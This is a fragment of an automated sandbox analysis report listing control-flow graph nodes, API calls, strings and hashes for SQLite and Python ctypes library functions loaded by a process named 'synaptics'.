6c0cdb8c-6c0cdb93 701->732 703->661 704->656 704->703 716 6c0cdd7c 706->716 717 6c0cdd80-6c0cdd87 706->717 708->679 709->710 710->683 736 6c0cdd45-6c0cdd4c 710->736 711->685 715 6c0cdac4-6c0cdac7 711->715 713->683 715->685 724 6c0cdac9-6c0cdacc 715->724 716->717 720 6c0cddbe-6c0cde0e call 6c1bf614 717->720 721 6c0cdd89-6c0cdd9c sqlite3_uri_parameter 717->721 727 6c0cdd9e-6c0cddb8 call 6c12bac0 721->727 728 6c0cddba 721->728 724->685 726 6c0cdace-6c0cdad3 724->726 726->677 726->685 727->720 727->728 728->720 732->708 736->713
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000040), ref: 6C0CD8CA
                                                                                                                                                                                                              • sqlite3_uri_parameter.SQLITE3(?,exclusive), ref: 6C0CD9DE
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000003,00000000,-00000003,04000102,00000000), ref: 6C0CDA3F
                                                                                                                                                                                                                • Part of subcall function 6C0CD4B0: memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0CD4E0
                                                                                                                                                                                                                • Part of subcall function 6C0CD4B0: memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0CD562
                                                                                                                                                                                                                • Part of subcall function 6C0CD4B0: sqlite3_free.SQLITE3(00000000), ref: 6C0CD579
                                                                                                                                                                                                                • Part of subcall function 6C0CD4B0: sqlite3_free.SQLITE3(00000000), ref: 6C0CD582
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000C368), ref: 6C0CDB22
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?), ref: 6C0CDB37
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?), ref: 6C0CDBD2
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(0000000E,%s at line %d of [%.10s],cannot open file,0000C378,df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24), ref: 6C0CDCAA
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?), ref: 6C0CDCEA
                                                                                                                                                                                                              • sqlite3_uri_parameter.SQLITE3(?,psow), ref: 6C0CDD92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C0CDCA3
                                                                                                                                                                                                              • df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24, xrefs: 6C0CDC94
                                                                                                                                                                                                              • exclusive, xrefs: 6C0CD9D5
                                                                                                                                                                                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C0CDB1B
                                                                                                                                                                                                              • psow, xrefs: 6C0CDD89
                                                                                                                                                                                                              • winOpen, xrefs: 6C0CDC87
                                                                                                                                                                                                              • cannot open file, xrefs: 6C0CDC9E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free$memset$sqlite3_logsqlite3_uri_parameter$CreateFile
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$cannot open file$delayed %dms for lock/sharing conflict at line %d$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$exclusive$psow$winOpen
                                                                                                                                                                                                              • API String ID: 4203897053-2474501099
                                                                                                                                                                                                              • Opcode ID: d300ba03902f626987a85656f7ffc168386338cc4ca1337441962304b80fde1a
                                                                                                                                                                                                              • Instruction ID: 20d69e1a6d1ad82fa822cb018a3f0ddd164a2704715815b101f5bfa69cd458ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d300ba03902f626987a85656f7ffc168386338cc4ca1337441962304b80fde1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC029B707463019BEB148F28D85575EB7F0EB86318F140A2EF8A5D7690DB34E945DB83

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 739 6c0a8c40-6c0a8c70 PySequence_Size _PyObject_GC_NewVar 740 6c0a8c76-6c0a8cbf 739->740 741 6c0a8f45-6c0a8f4d 739->741 742 6c0a8cc8-6c0a8ce2 PyObject_GC_Track 740->742 743 6c0a8cc1-6c0a8cc6 740->743 744 6c0a8d5d-6c0a8d6c 742->744 745 6c0a8ce4-6c0a8cec 742->745 743->742 746 6c0a8d79-6c0a8d87 744->746 747 6c0a8d6e-6c0a8d74 744->747 748 6c0a8cee-6c0a8cfb GetSystemInfo 745->748 749 6c0a8d01-6c0a8d25 VirtualAlloc 745->749 750 6c0a8d89-6c0a8d8c 746->750 751 6c0a8e07-6c0a8e1d 746->751 760 6c0a8f39-6c0a8f3c 747->760 748->749 752 6c0a8d27-6c0a8d29 749->752 753 6c0a8d45 749->753 755 6c0a8d90-6c0a8d9f PySequence_GetItem 750->755 756 6c0a8e28-6c0a8e2f 751->756 757 6c0a8e1f-6c0a8e26 751->757 752->753 758 6c0a8d2b 752->758 759 6c0a8d4b-6c0a8d4d 753->759 755->760 761 6c0a8da5-6c0a8dac 755->761 764 6c0a8f24-6c0a8f36 PyErr_SetString 756->764 765 6c0a8e35-6c0a8e3d 756->765 762 6c0a8e5e-6c0a8e7c 757->762 763 6c0a8d31-6c0a8d3b 758->763 759->744 766 6c0a8d4f-6c0a8d58 759->766 760->741 769 6c0a8f3e-6c0a8f42 760->769 770 6c0a8de8 761->770 771 6c0a8dae-6c0a8db6 761->771 767 6c0a8eb8 762->767 768 6c0a8e7e-6c0a8e86 762->768 763->763 772 6c0a8d3d-6c0a8d43 763->772 764->760 765->764 773 6c0a8e43-6c0a8e4a 765->773 766->760 777 6c0a8ebd-6c0a8ed5 ffi_prep_cif 767->777 768->767 775 6c0a8e88-6c0a8e8f 768->775 769->741 776 6c0a8ded-6c0a8df2 770->776 771->770 778 6c0a8db8-6c0a8dbf 771->778 772->759 773->764 779 6c0a8e50-6c0a8e55 773->779 775->767 780 6c0a8e91-6c0a8e99 775->780 782 6c0a8dfb-6c0a8e02 776->782 783 6c0a8df4-6c0a8df8 776->783 784 6c0a8eef-6c0a8f04 ffi_prep_closure 777->784 785 6c0a8ed7-6c0a8ed8 777->785 778->770 786 6c0a8dc1-6c0a8dc9 778->786 779->764 787 6c0a8e5b 779->787 780->777 788 6c0a8e9b-6c0a8ea0 780->788 782->755 789 6c0a8e04 782->789 783->782 792 6c0a8f0e-6c0a8f23 784->792 793 6c0a8f06-6c0a8f0c 784->793 790 6c0a8edd-6c0a8eed PyErr_Format 785->790 786->776 791 6c0a8dcb-6c0a8dd0 786->791 787->762 788->767 794 6c0a8ea2-6c0a8ea5 788->794 789->751 790->760 791->770 796 6c0a8dd2-6c0a8dd5 791->796 793->790 794->767 797 6c0a8ea7-6c0a8eaa 794->797 796->770 798 6c0a8dd7-6c0a8dda 796->798 797->767 799 6c0a8eac-6c0a8eaf 797->799 798->770 800 6c0a8ddc-6c0a8ddf 798->800 799->777 802 6c0a8eb1-6c0a8eb6 799->802 800->776 801 6c0a8de1-6c0a8de6 800->801 801->776 802->777
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySequence_Size.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0A546B), ref: 6C0A8C52
                                                                                                                                                                                                              • _PyObject_GC_NewVar.PYTHON310(6C0B5C88,00000000,?,?), ref: 6C0A8C63
                                                                                                                                                                                                              • PyObject_GC_Track.PYTHON310(00000000), ref: 6C0A8CC9
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6C0A8CF2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,AAAAAAAB,00001000,00000040), ref: 6C0A8D1D
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310 ref: 6C0A8D52
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310 ref: 6C0A8D6E
                                                                                                                                                                                                              • PySequence_GetItem.PYTHON310(00000000,00000000), ref: 6C0A8D94
                                                                                                                                                                                                              • ffi_prep_cif.LIBFFI-7(00000014,00000002,?,6C0B5504,00000044), ref: 6C0A8ECA
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9A14,ffi_prep_closure failed with %d,00000000), ref: 6C0A8EE4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$MemoryObject_Sequence_$AllocFormatInfoItemSizeSystemTrackVirtualffi_prep_cif
                                                                                                                                                                                                              • String ID: 0bal$ffi_prep_cif failed with %d$ffi_prep_closure failed with %d$invalid result type for callback function
                                                                                                                                                                                                              • API String ID: 2235389788-2629115145
                                                                                                                                                                                                              • Opcode ID: 93c0a295e7b35f4ea8072ab4d7b36137f06559b1415e33b5d6c844ec2447d6e6
                                                                                                                                                                                                              • Instruction ID: 22b51c05914904e6254faf2eb4d4e13affeb2d9d7f96cf8e563a713d729600db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93c0a295e7b35f4ea8072ab4d7b36137f06559b1415e33b5d6c844ec2447d6e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4891BD70A05682DFDB14CF95C944B9A77F5FF46309F148B2EE41A9BA42DB32E806CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000030,?,6C1142CC), ref: 6C0DC6C2
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,6C1142CC), ref: 6C0DC752
                                                                                                                                                                                                              • memmove.VCRUNTIME140(00000000,?,00000002,?,?,?,?,?,?,6C1142CC), ref: 6C0DC781
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,6C1142CC), ref: 6C0DC7DD
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,6C1142CC), ref: 6C0DC7E6
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,0000005C,?,?,?,?,?,?,6C1142CC), ref: 6C0DC9C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free$memset$memmove
                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                              • API String ID: 1177559194-2920599690
                                                                                                                                                                                                              • Opcode ID: 335936efa1e9027579b8f98879bd384b2a870ce138541e3c41b15a7d109ccdc4
                                                                                                                                                                                                              • Instruction ID: 9a8568ca29f79fca322610f090cad6b408502f811dbc7c729289654e8dfa4928
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 335936efa1e9027579b8f98879bd384b2a870ce138541e3c41b15a7d109ccdc4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD42BFB0A013018FEB10DF69D854B9ABBF5BF46308F2641A9E8199BB42D731F945CF91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,U|i:LoadLibrary,?,?), ref: 6C0AA94E
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.dlopen,6C0B0588,?), ref: 6C0AA96C
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,00000000), ref: 6C0AA982
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6C0AA997
                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?), ref: 6C0AA9A5
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0AA9B3
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(00000000), ref: 6C0AA9BA
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310(6C0B2224,?), ref: 6C0AA9CB
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6C0AA9DB
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0AA9E4
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(00000000), ref: 6C0AA9EB
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EA9B4,Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.,?), ref: 6C0AAA08
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • U|i:LoadLibrary, xrefs: 6C0AA946
                                                                                                                                                                                                              • Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax., xrefs: 6C0AAA01
                                                                                                                                                                                                              • ctypes.dlopen, xrefs: 6C0AA967
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Eval_Thread$FreeMem_Restore$Arg_AuditBuildCharErr_ErrorFormatLastLibraryLoadParseSaveStringSys_TupleUnicode_ValueWide
                                                                                                                                                                                                              • String ID: Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.$U|i:LoadLibrary$ctypes.dlopen
                                                                                                                                                                                                              • API String ID: 192189849-808210370
                                                                                                                                                                                                              • Opcode ID: 94531e74a659b69c7c892dbccce2193e651109a7fe6ab84edffa2b2d4e8afdc9
                                                                                                                                                                                                              • Instruction ID: 812151d83d4438e91be9de1bb3c5388b1db8659d110d5daa9745d876ba5f7cbc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94531e74a659b69c7c892dbccce2193e651109a7fe6ab84edffa2b2d4e8afdc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE219472A05104BBDF019BE8AE49BDD77FCEF4521AF100561FD09E1601EF338A258A99

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 814 6c0d4ef0-6c0d4f57 815 6c0d4f5d-6c0d4f62 814->815 816 6c0d507b-6c0d5080 814->816 817 6c0d4fbd-6c0d4fee call 6c0c4e40 815->817 818 6c0d4f64-6c0d4f66 815->818 816->817 819 6c0d5086-6c0d5088 816->819 828 6c0d55dd-6c0d55df 817->828 829 6c0d4ff4-6c0d503e memset 817->829 818->817 821 6c0d4f68-6c0d4f6d 818->821 819->817 822 6c0d508e-6c0d50aa call 6c0c4e40 819->822 824 6c0d4f70-6c0d4f75 821->824 831 6c0d5646-6c0d5651 822->831 832 6c0d50b0-6c0d50c9 822->832 824->824 826 6c0d4f77-6c0d4f8e call 6c0c4e40 824->826 826->831 842 6c0d4f94-6c0d4fa4 memmove 826->842 828->831 833 6c0d55e1-6c0d55e8 828->833 834 6c0d529e-6c0d52a8 829->834 835 6c0d5044-6c0d505d memmove 829->835 851 6c0d50e9-6c0d50ee 832->851 852 6c0d50cb-6c0d50d1 832->852 837 6c0d563c-6c0d5643 833->837 838 6c0d55ea-6c0d55f1 833->838 839 6c0d52b2-6c0d52c5 834->839 840 6c0d51f6 835->840 841 6c0d5063-6c0d5076 memmove 835->841 837->831 844 6c0d55fd-6c0d5624 838->844 845 6c0d55f3-6c0d55fa 838->845 847 6c0d53d8 839->847 848 6c0d52cb-6c0d52ce 839->848 846 6c0d51f7-6c0d523f memmove * 2 840->846 841->846 850 6c0d4fa7-6c0d4fac 842->850 844->831 884 6c0d5626-6c0d563b 844->884 845->844 846->839 854 6c0d5241-6c0d5248 846->854 853 6c0d53db-6c0d53eb 847->853 848->847 855 6c0d52d4-6c0d52f3 call 6c0cd840 848->855 850->850 856 6c0d4fae-6c0d4fb7 850->856 859 6c0d50f0-6c0d50f5 851->859 852->851 857 6c0d50d3-6c0d50e6 852->857 860 6c0d53ef-6c0d53f1 853->860 862 6c0d524a-6c0d5251 854->862 863 6c0d5292-6c0d529c 854->863 869 6c0d52f5-6c0d5313 855->869 856->817 857->851 859->859 864 6c0d50f7-6c0d5101 859->864 865 6c0d53f7-6c0d540a call 6c0d44d0 860->865 866 6c0d5480-6c0d5487 860->866 867 6c0d525d-6c0d5284 862->867 868 6c0d5253-6c0d525a 862->868 863->839 873 6c0d5104-6c0d5109 864->873 865->866 891 6c0d540c-6c0d547b 865->891 870 6c0d5489-6c0d5492 866->870 871 6c0d5498-6c0d54b4 call 6c0d0c50 sqlite3_free 866->871 867->839 900 6c0d5286-6c0d5290 867->900 868->867 876 6c0d5319-6c0d5320 869->876 877 6c0d53d1-6c0d53d6 869->877 870->871 873->873 882 6c0d510b-6c0d5121 873->882 879 6c0d5326-6c0d532f 876->879 880 6c0d5322-6c0d5324 876->880 877->860 886 6c0d5331-6c0d5335 879->886 880->886 889 6c0d515b-6c0d5163 882->889 890 6c0d5123-6c0d512b 882->890 896 6c0d5359-6c0d536e sqlite3_uri_parameter 886->896 897 6c0d5337-6c0d534a call 6c0d3890 886->897 893 6c0d5189-6c0d5190 889->893 894 6c0d5165-6c0d516e 889->894 898 6c0d5130-6c0d5135 890->898 916 6c0d547d 891->916 917 6c0d54b5-6c0d54ba 891->917 903 6c0d51e2-6c0d51e9 893->903 904 6c0d5192-6c0d5199 893->904 894->817 901 6c0d5174-6c0d5183 call 6c169a50 894->901 905 6c0d538a 896->905 906 6c0d5370-6c0d5388 call 6c12bac0 896->906 897->896 923 6c0d534c-6c0d5356 897->923 898->898 907 6c0d5137-6c0d5142 898->907 900->839 901->817 901->893 930 6c0d51ec-6c0d51f5 903->930 911 6c0d519b-6c0d51a2 904->911 912 6c0d51a5-6c0d51cc 904->912 914 6c0d538c-6c0d5395 905->914 906->914 915 6c0d5145-6c0d514a 907->915 911->912 912->930 943 6c0d51ce-6c0d51e1 912->943 925 6c0d53ca-6c0d53cf 914->925 926 6c0d5397-6c0d53ac sqlite3_uri_parameter 914->926 915->915 927 6c0d514c-6c0d5156 915->927 916->866 921 6c0d54bc-6c0d54da call 6c1c0470 917->921 922 6c0d54f4-6c0d5504 917->922 940 6c0d54dc 921->940 941 6c0d54f1 921->941 937 6c0d5506-6c0d550d 922->937 938 6c0d5510-6c0d5546 922->938 923->896 925->853 926->877 928 6c0d53ae-6c0d53c8 call 6c12bac0 926->928 927->890 929 6c0d5158 927->929 928->877 928->925 929->889 937->938 944 6c0d554f-6c0d557a call 6c0d3890 938->944 945 6c0d5548 938->945 946 6c0d54de-6c0d54e3 940->946 947 6c0d54e5-6c0d54ea 940->947 941->922 952 6c0d557c-6c0d5580 944->952 953 6c0d5582-6c0d5584 944->953 945->944 946->941 946->947 947->941 954 6c0d558f-6c0d559d 952->954 955 6c0d558b 953->955 956 6c0d5586-6c0d5589 953->956 957 6c0d559f-6c0d55b7 954->957 958 6c0d55b8-6c0d55dc 954->958 955->954 956->954 956->955
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(00000000,?,?,00000001,?), ref: 6C0D4F9A
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?,00000001,?), ref: 6C0D4FFA
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,00000000,00000000,?,?,?,00000001,?), ref: 6C0D5047
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,00000001,?), ref: 6C0D5068
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,00000000,00000000,?,?,?,?,?,?,00000001,?), ref: 6C0D5203
                                                                                                                                                                                                              • memmove.VCRUNTIME140(?,?,00000000,?,?,?,?,?,?,?,?,?,00000001,?), ref: 6C0D522B
                                                                                                                                                                                                              • sqlite3_uri_parameter.SQLITE3(?,nolock), ref: 6C0D5364
                                                                                                                                                                                                              • sqlite3_uri_parameter.SQLITE3(?,immutable), ref: 6C0D53A2
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(00000000,?,?,?,00000001,?), ref: 6C0D54A4
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C0D54D3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$sqlite3_uri_parameter$Unothrow_t@std@@@__ehfuncinfo$??2@memsetsqlite3_free
                                                                                                                                                                                                              • String ID: immutable$nolock$rnal
                                                                                                                                                                                                              • API String ID: 1741901910-1927824297
                                                                                                                                                                                                              • Opcode ID: 39c8a3d665067401d522c0895df622b1e56a1a076714ef0aa94436be3c0f5112
                                                                                                                                                                                                              • Instruction ID: 7fce91f999c05a5868b46fbc42fe468087c8d9649c4c1a97e371310ebcfbbe47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39c8a3d665067401d522c0895df622b1e56a1a076714ef0aa94436be3c0f5112
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F532CEB5A01305AFDB04CFA8D88079ABBF4FF06308F15426AEC299B741E735E955CB91

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1189 6c0a52a0-6c0a52af 1190 6c0a52b1-6c0a52c4 call 6c0a48e0 1189->1190 1191 6c0a52c5-6c0a52c9 1189->1191 1193 6c0a52cf-6c0a52dc 1191->1193 1194 6c0a540d-6c0a5422 _PyArg_ParseTuple_SizeT 1191->1194 1198 6c0a52de-6c0a52f3 call 6c0a5050 1193->1198 1199 6c0a52f4-6c0a52f7 1193->1199 1195 6c0a5428-6c0a5436 PyCallable_Check 1194->1195 1196 6c0a5501-6c0a5508 1194->1196 1202 6c0a5438-6c0a543d 1195->1202 1203 6c0a5442-6c0a544c call 6c0ad820 1195->1203 1200 6c0a53b9-6c0a53bc 1199->1200 1201 6c0a52fd-6c0a530a 1199->1201 1200->1194 1205 6c0a53be-6c0a53cb 1200->1205 1201->1194 1207 6c0a5310-6c0a5351 _PyArg_ParseTuple_SizeT 1201->1207 1209 6c0a54f1-6c0a54fe PyErr_SetString 1202->1209 1217 6c0a54ec 1203->1217 1218 6c0a5452-6c0a5457 1203->1218 1205->1194 1210 6c0a53cd-6c0a53db PyLong_AsVoidPtr 1205->1210 1211 6c0a535d-6c0a537a call 6c0a4d70 1207->1211 1212 6c0a5353-6c0a535c 1207->1212 1209->1196 1214 6c0a53eb-6c0a53fc call 6c0a48e0 1210->1214 1215 6c0a53dd-6c0a53e5 PyErr_Occurred 1210->1215 1211->1212 1223 6c0a537c-6c0a539b call 6c0a48e0 1211->1223 1214->1196 1226 6c0a5402-6c0a540c 1214->1226 1215->1196 1215->1214 1217->1209 1218->1217 1221 6c0a545d-6c0a5466 call 6c0a8c40 1218->1221 1225 6c0a546b-6c0a5472 1221->1225 1231 6c0a539d-6c0a539f 1223->1231 1232 6c0a53a2-6c0a53a9 1223->1232 1225->1196 1228 6c0a5478-6c0a548b call 6c0a48e0 1225->1228 1236 6c0a548d-6c0a5490 1228->1236 1237 6c0a54a4-6c0a54cc call 6c0a3f60 1228->1237 1231->1232 1234 6c0a53ab-6c0a53ae 1232->1234 1235 6c0a53b1-6c0a53b8 1232->1235 1234->1235 1236->1196 1238 6c0a5492-6c0a54a3 _Py_Dealloc 1236->1238 1241 6c0a54ce-6c0a54d0 1237->1241 1242 6c0a54e4-6c0a54eb 1237->1242 1241->1196 1243 6c0a54d2-6c0a54e3 _Py_Dealloc 1241->1243
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • cannot construct instance of this class: no argtypes, xrefs: 6C0A54EC
                                                                                                                                                                                                              • argument must be callable or integer function address, xrefs: 6C0A5438
                                                                                                                                                                                                              • is|Oz#, xrefs: 6C0A5340
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc
                                                                                                                                                                                                              • String ID: argument must be callable or integer function address$cannot construct instance of this class: no argtypes$is|Oz#
                                                                                                                                                                                                              • API String ID: 3617616757-1606460020
                                                                                                                                                                                                              • Opcode ID: e07283c8df81ea6e728fb12cf81576e35de74fbc10c8655d8f5ec976c1499e7e
                                                                                                                                                                                                              • Instruction ID: 5a14762e795409b51277a6f06270ea1e142b2815bd238c2501d650e2bba08255
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e07283c8df81ea6e728fb12cf81576e35de74fbc10c8655d8f5ec976c1499e7e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0671E179A045049FCB00CFD9E840BAE77F9FF85328F148165EC0987612EB32E916DB80

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
